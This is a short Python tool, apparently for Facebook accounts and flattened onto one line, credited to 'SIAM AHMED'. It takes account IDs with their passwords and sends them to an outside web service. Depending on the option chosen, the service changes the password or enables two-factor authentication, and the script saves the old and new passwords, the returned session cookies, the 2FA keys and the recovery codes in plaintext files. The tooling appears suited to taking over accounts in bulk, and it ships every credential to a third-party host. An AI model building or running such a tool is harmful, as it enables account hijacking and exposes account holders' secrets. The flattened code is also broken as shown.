#Coded by SIAM AHMED import requests,os,sys apiBase="https://auto-fb.vercel.app/" key="f2eafe780e03335b936f52743c791771" pwc=f"free/p/c/v1-283920872/{key}/cred" tf=f"free/p/c/v1-283920872/{key}/2f" def clear(): os.system('clear') logo=""" \n \t2F and Password Changer By SIAM AHMED \n """ print(logo) def tfa(): try: clear() e,p=input("UID|PASS: ").split("|") link=apiBase+tf params={ "uid":e, "p":p } x=requests.get(link,params=params).json() if x["status"]=="success": key=x["key"] hascode=x["hasCode"] rcodes=x["recoveryCodes"] rc="" if hasCode=="true": for i in rcodes: rc+=i+"\n" print("2F KEY= ",key) print(rc) open("/sdcard/2F.txt","a").write(f"{e}|{p}|{key}\n{rc}\n") else: print("Failed to apply 2F") except Exception as err: print("ERROR OCCURRED!\nERROR=",err) def pw(): try: clear() e,o,n=input("UID|OLD|NEW: ").split("|") link=apiBase+pwc params={ "uid":e, "ocred":o, "ncred":n } x=requests.get(link,params=params).json() if x["status"]=="success": cookie=x['cookie'] print("Password changed successfully.") open("/sdcard/pwc.txt","a").write(f"{e}|{n} [OLD:{o}]\n{cookie}\n") else: print("Failed to change password.") except Exception as err: print("ERROR OCCURRED!\nERROR=",err) def main(): clear() op=input("[1] 2F\n[2] Password change\nSelect: ") if "1" in op: tfa() else: pw() main()